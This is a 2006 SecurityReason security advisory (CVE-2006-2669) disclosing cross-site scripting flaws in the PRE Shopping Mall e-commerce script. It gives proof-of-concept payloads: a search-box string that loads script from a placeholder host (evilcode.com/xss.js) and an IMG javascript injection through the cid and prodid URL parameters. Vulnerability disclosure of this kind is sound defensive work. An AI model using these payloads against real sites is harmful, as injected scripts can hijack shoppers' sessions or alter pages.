|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 990 CVE : CVE-2006-2669 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : luny youfucktard com Published : 31.05.2006
Advisory Text : Pre Shopping Mall Homepage: http://www.preprojects.com/emall.asp Description: PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy install and start selling your products. Very easy to installs and manage powerful administration. Receive payments either through Paypal or Authorize.net. Quickest solution for your online business. Effected files: search box. detail.php products.php Exploits & Vulns: XSS Vulnerabilities: The search and login box does not sanatize user input before generating it dynamically. This could cause XSS. For proof of concept just try putting this in the search box: '';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--" <XSS>=&{()} More XSS Vulns: For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')> http://www.example.com/emall/products.php?cid=[XSS] http://www.example.com/emall/detail.php?prodid=[XSS] Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |